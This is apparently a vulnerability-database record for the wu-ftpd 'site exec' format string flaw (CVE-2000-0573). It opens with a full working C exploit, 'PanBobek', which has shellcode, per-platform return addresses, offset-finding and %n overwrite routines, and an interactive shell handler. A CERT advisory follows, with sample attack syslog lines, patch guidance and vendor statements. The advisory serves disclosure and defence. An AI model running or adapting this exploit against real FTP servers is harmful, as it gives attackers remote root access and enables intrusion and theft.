\x8d\\x56\\x0c\"\r\n\t\"\\x52\\x51\\x53\\x53\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x53\\x53\"\r\n\t\"\\xb0\\x01\\xcd\\x80\\xe8\\x84\\xff\\xff\\xff\\x30\\x62\\x69\\x6e\\x30\"\r\n\t\"\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\\x76\\x65\\x6e\\x67\\x6c\\x69\\x6e\"\r\n\t\"\\x40\\x6b\\x6f\\x63\\x68\\x61\\x6d\\x2e\\x6b\\x61\\x73\\x69\\x65\\x2e\"\r\n\t\"\\x63\\x6f\\x6d\";\r\n\r\nstruct platforms\r\n{\r\n\tchar *os;\r\n\tchar *version;\r\n\tchar *code;\r\n\tint align;\r\n\tint eipoff;\r\n\tlong ret;\r\n\tlong retloc;\r\n\tint sleep;\r\n};\r\n\r\nstruct platforms targ[] =\r\n{\r\n\t{ \"FreeBSD 3.4-STABLE\", \"2.6.0-ports\", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },\r\n\t{ \"FreeBSD 5.0-CURRENT\", \"2.6.0-ports\", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },\r\n\t{ \"FreeBSD 3.4-STABLE\", \"2.6.0-packages\", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },\r\n\t{ \"FreeBSD 3.4-STABLE\", \"2.6.0-venglin\", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 
0x80759e0, 0xbfffd04c, 0 },\r\n\t{ \"RedHat Linux 6.2-SMP\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },\r\n\t{ NULL, NULL, NULL, 0, 0, 0, 0 }\r\n};\r\n\r\nlong getip(name)\r\nchar *name;\r\n{\r\n\tstruct hostent *hp;\r\n\tlong ip;\r\n\textern int h_errno;\r\n\r\n\tif ((ip = inet_addr(name)) < 0)\r\n\t{\r\n\t\tif (!(hp = gethostbyname(name)))\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"gethostbyname(): %s\\n\",\r\n\t\t\t\tstrerror(h_errno));\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tmemcpy(&ip, (hp->h_addr), 4);\r\n\t}\r\n\r\n\treturn ip;\r\n}\r\n\r\nint connecttoftp(host, port)\r\nchar *host;\r\nint port;\r\n{\r\n\tint sockfd;\r\n\tstruct sockaddr_in cli;\r\n\r\n\tbzero(&cli, sizeof(cli));\r\n\tcli.sin_family = AF_INET;\r\n\tcli.sin_addr.s_addr=getip(host);\r\n\tcli.sin_port = htons(port);\r\n\r\n\tif((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n\t{\r\n\t\tperror(\"socket\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tif(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) \r\n\t{\r\n perror(\"connect\");\r\n\t\tclose(sockfd);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tcin = fdopen(sockfd, \"r\");\r\n\tcout = fdopen(sockfd, \"w\");\r\n\r\n\tif (!cin || !cout)\r\n\t{\r\n\t\tclose(sockfd);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\treturn sockfd;\r\n}\r\n\r\nint command(const char *fmt, ...)\r\n{\r\n\tchar buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;\r\n\r\n\tva_list args;\r\n\r\n\tif (!cout)\r\n\t\treturn -1;\r\n\r\n\tbzero(buf1, BUFSIZ);\r\n\tbzero(buf2, BUFSIZ*2);\r\n\r\n\tva_start(args, fmt);\r\n\tvsnprintf(buf1, BUFSIZ, fmt, args);\r\n\tva_end(args);\r\n\r\n\tfor (p=buf1,q=buf2;*p;p++,q++)\r\n\t{\r\n\t\tif (*p == '\\xff')\r\n\t\t{\r\n\t\t\t*q++ = '\\xff';\r\n\t\t\t*q = '\\xff';\r\n\t\t}\r\n\t\telse\r\n\t\t\t*q = *p;\r\n\t}\r\n\r\n\tfprintf(cout, \"%s\", buf2);\r\n\r\n#ifdef DEBUG\r\n\tfprintf(stderr, \"--> \");\r\n\tfprintf(stderr, \"%s\", buf2);\r\n\tfputc('\\n', stderr);\r\n#endif\r\n\r\n\tfputs(\"\\r\\n\", cout);\r\n\t(void)fflush(cout);\r\n\treturn 0;\r\n}\r\n\r\nint 
getreply(v)\r\nint v;\r\n{\r\n\tif (!(fgets(recvbuf, BUFSIZ, cin)))\r\n\t\treturn -1;\r\n\r\n\tif (v)\r\n\t\tfprintf(stderr, \"<-- %s\", recvbuf);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint logintoftp(login, passwd)\r\nchar *login, *passwd;\r\n{\r\n\tdo\r\n\t\trepl;\r\n\twhile (strncmp(recvbuf, \"220 \", 4));\r\n\r\n\tif ((command(\"USER %s\", login)) < 0)\r\n\t\treturn -1;\r\n\r\n\trepl;\r\n\r\n\tif (strncmp(recvbuf, \"331\", 3))\r\n\t{\r\n\t\tputs(recvbuf);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tif ((command(\"PASS %s\", passwd) < 0))\r\n\t\treturn -1;\r\n\r\n\tdo\r\n\t\trepl;\r\n\twhile (strncmp(recvbuf, \"230 \", 4));\r\n\r\n\treturn 0;\r\n}\r\n\r\nint checkvuln(void)\r\n{\r\n\tcommand(\"SITE EXEC %%p\");\r\n\trepl;\r\n\r\n\tif(strncmp(recvbuf, \"200-\", 4))\r\n\t\treturn -1;\r\n\r\n\tif(strncmp(recvbuf+4, \"0x\", 2))\r\n\t\treturn -1;\r\n\r\n\trepl;\r\n\r\n\treturn 0;\r\n}\r\n\r\nint findeip(eipoff, align)\r\nint eipoff, align;\r\n{\r\n\tint i, j, off;\r\n\tchar *p1;\r\n\tchar eip1[10], eip2[10];\r\n\r\n\tfor (i=eipoff;;i+=8)\r\n\t{\r\n\t\tfprintf(stderr, \"at offset %d\\n\", i);\r\n\t\tstrcpy(sendbuf, \"SITE EXEC \");\r\n \r\n\t\tfor (j=0;j<align;j++) strcat(sendbuf, \"a\");\r\n\t\tstrcat(sendbuf, \"abcd\");\r\n\r\n\t\tfor (j=0;j<eipoff/8;j++) strcat(sendbuf, \"%%.f\");\r\n\t\tfor (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, \"%%d%%d\");\r\n\t\tstrcat(sendbuf, \"|%%.8x|%%.8x\");\r\n\r\n\t\tif (command(sendbuf) < 0)\r\n\t\t\treturn -1;\r\n\r\n\t\trepl;\r\n\r\n\t\tif (!(p1 = strchr(recvbuf, '|')))\r\n\t\t\treturn -1;\r\n\r\n\t\tstrncpy(eip1, p1+1, 8);\r\n\t\tstrncpy(eip2, p1+10, 8);\r\n\r\n\t\teip1[8] = eip2[8] = '\\0';\r\n\r\n\t\tif (!(strcmp(eip1, \"64636261\")))\r\n\t\t{\r\n\t\t\toff = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tif (!(strcmp(eip2, \"64636261\")))\r\n\t\t{\r\n\t\t\toff = i + 4;\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\trepl;\r\n\t}\r\n\r\n\trepl;\r\n\r\n\treturn off;\r\n}\r\n\r\nchar *putshell(type)\r\nint type;\r\n{\r\n\tstatic char buf[400];\r\n\tint 
noplen;\r\n\r\n\tchar *code = targ[type].code;\r\n\r\n\tnoplen = sizeof(buf) - strlen(code) - 2;\r\n\r\n\tmemset(buf, 0x90, noplen);\r\n\tbuf[noplen+1] = '\\0';\r\n\tstrcat(buf, code);\r\n\r\n\treturn buf;\r\n}\r\n\r\nint overwrite(ptr, off, align, retloc, eipoff)\r\nlong ptr, retloc;\r\nint off, align, eipoff;\r\n{\r\n\tint i, size = 0;\r\n\tchar buf[100];\r\n\r\n\tfprintf(stderr, \"RET: %p, RET location: %p,\"\r\n\t\t\" RET location offset on stack: %d\\n\",\r\n\t\t(void *)ptr, (void *)retloc, off);\r\n\r\n\tif (off >= 12)\r\n\t{\r\n\r\n\t\tstrcpy(sendbuf, \"SITE EXEC \");\r\n\r\n\t\tfor (i=0;i<eipoff/8;i++) strcat(sendbuf, \"%%.f\");\r\n\t\tfor (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\t\tif (((off-eipoff-8) % 8) != 0) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\t\tif (command(sendbuf) < 0)\r\n\t\t\treturn -1;\t\r\n\r\n\t\trepl;\r\n\r\n\t\tsize = strlen(recvbuf+4) - 2;\r\n\r\n\t\trepl;\r\n\t}\r\n\r\n\tfprintf(stderr, \"Reply size: %d, New RET: %p\\n\", size,\r\n\t\t(void *)(ptr-size));\r\n\r\n\tstrcpy(sendbuf, \"SITE EXEC \");\r\n\tfor (i=0;i<align;i++) strcat(sendbuf, \"a\");\r\n\r\n\tsprintf(buf, \"%c%c%c%c\", ((int)retloc & 0xff),\r\n\t\t(((int)retloc & 0xff00) >> 8),\r\n\t\t(((int)retloc & 0xff0000) >> 16),\r\n\t\t(((int)retloc & 0xff000000) >> 24));\r\n\r\n\tstrcat(sendbuf, buf);\r\n\r\n\tfor (i=0;i<eipoff/8;i++) strcat(sendbuf, \"%%.f\");\r\n\tfor (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\tif (((off-eipoff-8) % 8) != 0) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\tstrcat(sendbuf, \"%%.\");\r\n\tsprintf(buf, \"%d\", (int)ptr-size);\r\n\tstrcat(sendbuf, buf);\r\n\tstrcat(sendbuf, \"d%%n\");\r\n\r\n\tif (command(sendbuf) < 0)\r\n\t\treturn -1;\r\n\r\n\treturn 0;\r\n}\r\n\r\nint sh(sockfd)\r\nint sockfd;\r\n{\r\n\tchar buf[BUFSIZ];\r\n\tint c;\r\n\tfd_set rf, drugi;\r\n\tchar cmd[] = \"uname -a ; pwd ; id\\n\";\r\n \r\n\tFD_ZERO(&rf);\r\n\tFD_SET(0, &rf);\r\n\tFD_SET(sockfd, &rf);\r\n\twrite(sockfd, cmd, 
strlen(cmd));\r\n\r\n\twhile (1)\r\n\t{\r\n\t\tbzero(buf, BUFSIZ);\r\n\t\tmemcpy (&drugi, &rf, sizeof(rf));\r\n\t\tselect(sockfd+1, &drugi, NULL, NULL, NULL);\r\n\t\tif (FD_ISSET(0, &drugi))\r\n\t\t{\r\n\t\t\tc = read(0, buf, BUFSIZ);\r\n\t\t\tsend(sockfd, buf, c, 0x4);\r\n\t\t}\r\n\r\n\t\tif (FD_ISSET(sockfd, &drugi))\r\n\t\t{\r\n\t\t\tc = read(sockfd, buf, BUFSIZ);\r\n\t\t\tif (c<0) return 0;\r\n\t\t\twrite(1,buf,c);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nint main(argc, argv)\r\nint argc;\r\nchar **argv;\r\n{\r\n\textern int optind, opterr;\r\n\textern char *optarg;\r\n\tint ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;\r\n\tlong ret, retloc;\r\n\tchar login[BUFSIZ], password[BUFSIZ];\r\n\r\n\topterr = retofs = retlocofs = 0;\r\n\tstrcpy(login, \"ftp\");\r\n\ttype = -1;\r\n\tport = 21;\r\n\r\n\twhile ((ch = getopt(argc, argv, \"l:f:s:t:o\")) != -1)\r\n\t\tswitch((char)ch)\t\r\n\t\t{\r\n\t\t\tcase 'l':\r\n\t\t\t\tstrcpy(login, optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 't':\r\n\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 'o':\r\n\t\t\t\tport = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 'f':\r\n\t\t\t\tretofs = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 's':\r\n\t\t\t\tretlocofs = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase '?':\r\n\t\t\tdefault:\r\n\t\t\t\tputs(usage);\r\n\t\t\t\texit(0);\r\n\t\t}\r\n\r\n\targc -= optind;\r\n\targv += optind;\r\n\r\n\tfprintf(stderr, \"PanBobek v1.1 by venglin@freebsd.lublin.pl\\n\\n\");\r\n\r\n\tif (type < 0)\r\n\t{\r\n\t\tfprintf(stderr, \"Please select platform:\\n\");\r\n\t\tfor (i=0;targ[i].os;i++)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"\\t-t %d : %s %s (%p / %p)\\n\", i,\r\n\t\t\t\ttarg[i].os, targ[i].version,\r\n\t\t\t\t(void *)targ[i].ret,\r\n\t\t\t\t(void *)targ[i].retloc);\r\n\t\t}\r\n\t\texit(0);\r\n\t}\r\n\r\n\tfprintf(stderr, \"Selected platform: %s with WUFTPD %s\\n\\n\",\r\n\t\ttarg[type].os, targ[type].version);\r\n\r\n\teipoff = targ[type].eipoff;\r\n\talign = 
targ[type].align;\r\n\tret = targ[type].ret;\r\n\tretloc = targ[type].retloc;\r\n\tretloc += retlocofs;\r\n\tret += retofs;\r\n\r\n\tif (argc != 1)\r\n\t{\r\n\t\tputs(usage);\r\n\t\texit(0);\r\n\t}\r\n\r\n\tstrcpy(password, putshell(type));\r\n\r\n\tif ((fd = connecttoftp(*argv, port)) < 0)\r\n\t{ \r\n\t\t(void)fprintf(stderr, \"Connection to %s failed.\\n\", *argv);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t(void)fprintf(stderr, \"Connected to %s. Trying to log in.\\n\", *argv);\r\n\r\n\tif (logintoftp(login, password) < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"Logging in to %s (%s) failed.\\n\",\r\n\t\t\t*argv, login);\r\n\t\texit(1);\r\n }\r\n\r\n\t(void)fprintf(stderr, \"Logged in as %s. Checking vulnerability.\\n\",\r\n\t\tlogin);\r\n\r\n\tsleep(targ[type].sleep);\r\n\r\n\tif (checkvuln() < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"Sorry, this version isn't\"\r\n\t\t\t\" vulnerable or uses internal vsnprintf().\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t(void)fprintf(stderr, \"Ok, trying to find offset (initial: %d)\\n\",\r\n\t\teipoff);\r\n\r\n\tif ((retoff = findeip(eipoff, align)) < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"\\nError finding offset. Adjust\"\r\n\t\t\t\" align.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (overwrite(ret, retoff, align, retloc, eipoff) < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"Error overwriting RET addr.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tfprintf(stderr, \"Wait up to few minutes for reply. 
It depends on \"\r\n\t\t\t\"victim's CPU speed.\\nEnjoy your shell.\\n\");\r\n\r\n\tsh(fd);\r\n\r\n\texit(0);\r\n}\r\n\n\n// milw0rm.com [2000-11-21]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/201/"}], "cert": [{"lastseen": "2020-09-18T20:45:09", "bulletinFamily": "info", "cvelist": ["CVE-2000-0573"], "description": "### Overview \n\nA vulnerability involving an input validation error in the \"site exec\" command has recently been identified in the Washington University ftpd (wu-ftpd) software package. Sites running affected systems are advised to update their wu-ftpd software as soon as possible. \n\nA similar but distinct vulnerability has also been identified that involves a missing format string in several setproctitle() calls. It affects a broader number of ftp daemons. Please see the vendor section of this document for specific information about the status of specific ftpd implementations and solutions. \n\n### Description \n\n**\"Site exec\" Vulnerability**\n\n \nA vulnerability has been identified in wu-ftpd and other ftp daemons based on the wu-ftpd source code. Wu-ftpd is a common package used to provide file transfer protocol (ftp) services. This vulnerability is being discussed as the wu-ftpd \"site exec\" or \"lreply\" vulnerability in various public forums. Incidents involving the exploitation of this vulnerability which enables remote users to gain root privileges have been reported to the CERT Coordination Center. \n \nThe problem is described in AUSCERT Advisory AA-2000.02, \"wu-ftpd 'site exec' Vulnerability,\" which is available from \n\n[_ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02_](<ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02>) \nThe wu-ftpd \"site exec\" vulnerability is the result of missing character-formatting argument in several function calls that implement the \"site exec\" command functionality. 
Normally if \"site exec\" is enabled, a user logged into an ftp server (including the 'ftp' or 'anonymous' user) may execute a restricted subset of quoted commands on the server itself. However, if a malicious user can pass character format strings consisting of carefully constructed *printf() conversion characters (%f, %p, %n, etc) while executing a \"site exec\" command, the ftp daemon may be tricked into executing arbitrary code as root. \n \nThe \"site exec\" vulnerability appears to have been in the wu-ftpd code since the original wu-ftpd 2.0 came out in 1993. Any vendors who have based their own ftpd distributions on this vulnerable code are also likely to be vulnerable. \n \nThe vulnerability appears to be exploitable if a local user account can be used for ftp login. Also, if the \"site exec\" command functionality is enabled, then anonymous ftp login allows sufficient access for an attack. \n \n**setproctitle() Vulnerability** \n \nA separate vulnerability involving a missing character-formatting argument in setproctitle(), a call which sets the string used to display process identifier information, is also present in wu-ftpd. Other ftpd implementations have been found to have vulnerable setproctitle() calls as well, including those from proftpd and OpenBSD. \n \nThe setproctitle() vulnerability appears to have been present in various ftpd implementations since at least BSD ftpd 5.51 (which predates wuarchive-ftpd 1.0). It has also been confirmed to be present in BSD ftpd 5.60 (the final BSD release). Any vendors who have based their own ftpd distributions on this vulnerable code are also likely to be vulnerable. \n \nIt should be noted that many operating systems do not support setproctitle() calls. However, other software engineering defects involving the same type of missing character-formatting argument may be present. 
\n \n**Intruder Activity** \n \nOne possible indication you are being attacked with either of these vulnerabilities may be the appearance of syslog entries similar to the following: \n\n \n`Jul 4 17:43:25 victim ftpd[3408]: USER ftp \nJul 4 17:43:25 victim ftpd[3408]: PASS [malicious shellcode] \nJul 4 17:43:26 victim ftpd[3408]: ANONYMOUS FTP LOGIN FROM \nattacker.example.com [10.29.23.19], [malicious shellcode] \nJul 4 17:43:28 victim-site ftpd[3408]: SITE EXEC (lines: 0): \n%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% \n.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. \nf%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f \n%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% \n.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. \nf%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f \n%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f|%p \nJul 4 17:43:28 victim ftpd[3408]: FTP session closed` \nDetails and exploits for both the \"site exec\" and setproctitle() vulnerabilities have been posted in various public forums. Please see [_http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1387_](<http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1387>)_ \n_[_http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1425_](<http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1425>)_ \n_[_http://ciac.llnl.gov/ciac/bulletins/k-054.shtml_](<http://ciac.llnl.gov/ciac/bulletins/k-054.shtml>) \nThe CERT/CC has received reports of both of these vulnerabilities being successfully exploited on the Internet. Please check our [_Current Activity_](<http://www.cert.org/current/current_activity.html>) page for updates regarding intruder activity involving these vulnerabilities. \n--- \n \n### Impact \n\nBy exploiting any of these input validation problems, local or remote users logged into the ftp daemon may be able execute arbitrary code as root. 
An anonymous ftp user may also be able to execute arbitrary code as root. \n \n--- \n \n### Solution \n\n**Upgrade your version of ftpd** \nPlease see the vendors records in this vulnerability note for more information about the availability of updated ftpd packages specific for your system. \n \n**Apply a patch from your vendor** \nIf you are running vulnerable ftpd implementations and cannot upgrade, you need to apply the appropriate vendor patches and recompile and/or reinstall the ftpd server software. \n \nThe vendor section of this document contains information provided by vendors. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. \n \n**Disable ftp services** \nIf neither an upgrade nor a patch can be applied, the CERT/CC recommends disabling all vulnerable wu-ftpd and proftpd servers. While disabling \"site exec\" command functionality or anonymous ftp access minimizes exposure to the \"site exec\" vulnerability, neither is a complete solution and may not mitigate against the risks involved with exposure to the setproctitle() vulnerability. \n \n--- \n \n### Vendor Information\n\n29823\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Conectiva __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see: \n\n \n[_http://www.securityfocus.com/templates/archive.pike?list =1&msg=20000623212826.A13925@conectiva.com.br_](<http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000623212826.A13925@conectiva.com.br>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Debian __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see the following regarding the wu-ftpd \"site exec\" issue: \n\n \n<http://www.debian.org/security/2000/20000623> Copyright \u00a9 1997-2000 SPI \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Hewlett Packard __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nHP is vulnerable. Please see: \n\n \nHPSBUX0007-117: Sec. Vulnerability in ftpd, **Rev.01** HEWLETT-PACKARD COMPANY SECURITY ADVISORY: #00117, 11 July '00, Last Revised: 12 July '00 \nAn excerpt:\n\nPROBLEM: The ftp server (ftpd) on HP-UX allows users root access. \nPLATFORM: HP-UX release 11.00 - Both Problem #1 and #2 below; HP-UX release 10.20 - Problem #2, setproctitle(), only \nDAMAGE: Unauthorized root access. \nSOLUTION: Install temporary binary until an official patch is released. 
\nAVAILABILITY: The temporary binary is available now (see below). \n\n\n* * *\n\n \nA. Background \nThere are 2 problems with FTP Server (ftpd) on HP-UX. \n 1. ftpd handling of the SITE EXEC command that allows remote users to gain root access. This is possible in the default configuration of ftpd on HP-UX 11.00 ONLY. \n 2. ftpd does not properly format the parameters to the setproctitle() function, allowing users to gain root access. This problem applies to both 11.00 and 10.X. \nB. Fixing the problem \nAll system administrators are encouraged to install our temporary binary until an official patch is released. The file can be retrieved to simply replace the original factory supplied binary. \nC. Recommended solution \nTwo temporary ftp binaries (for HP-UX 11.00 and HP-UX 10.20) can be found at: \n[_ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.11.0_](<ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.11.0>) _ \n_[_ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.10.20_](<ftp://ftp.cup.hp.com/dist/networking/ftp/ftpd.10.20>) \n**Revised 01** \n\\--->>>These are to be installed in /usr/lbin/ftpd, with permissions 544. NOTE: This advisory [HPSBUX0007-117] will be updated when patches become available. 
\nCopyright \u00a9 2000 Hewlett-Packard Company \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### NetBSD __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see NetBSD Security Advisories NetBSD-SA2000-009 & NetBSD-SA2000-010: \n\n \n[_ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc_](<ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc>) _ \n_[_ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-010.txt.asc_](<ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-010.txt.asc>) Copyright \u00a9 2000, The NetBSD Foundation, Inc. All Rights Reserved. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### OpenBSD __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe setproctitle bug is in OpenBSD. 
Please see: \n\n \n[_http://www.openbsd.org/errata.html#ftpd_](<http://www.openbsd.org/errata.html#ftpd>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Washington University __ Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe WU-FTPD Development Group's primary distribution site is mirrored world-wide. A list of mirrors is available from: \n\n \n[_http://www.wu-ftpd.org/mirrors.txt_](<http://www.wu-ftpd.org/mirrors.txt>) If possible, please use a mirror to obtain patches or the latest version. \n \n**Upgrade your version of wu-ftpd** \nThe latest release of wu-ftpd, version 2.6.1, has been released to address these and several other security issues: \n\n[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z>) _ \n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc>) \n**Apply a patch** \nThe wu-ftpd developers have published the following patch for wu-ftpd 2.6.0: \n\n[_ftp://ftp.wu-ftpd.org/pub/ wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch>) _ 
\n_[_ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch.asc_](<ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch.asc>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### BSDI __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCurrent versions of BSD/OS do not include any version of wu-ftpd. The BSDI ftpd is not vulnerable to the reported problems; it is not based on the wu-ftpd code. \n\nThe version of ftpd in modern versions of BSD/OS is not vulnerable to the generic setproctitle() vulnerabilities. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### FreeBSD __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe version of ftpd shipped with all versions of FreeBSD since 2.2.0 is not vulnerable to this problem. FreeBSD also ships with several optional third-party FTP servers in the Ports Collection, including wu-ftpd and proftpd. The wu-ftpd vulnerability was corrected on 2000/06/24 and is the subject of [_FreeBSD Security Advisory SA-00:29_](<ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00%3A29.wu-ftpd.asc.v1.1>). At this time no patch has been released by the proftpd vendor and the version in FreeBSD ports is still vulnerable to this attack. 
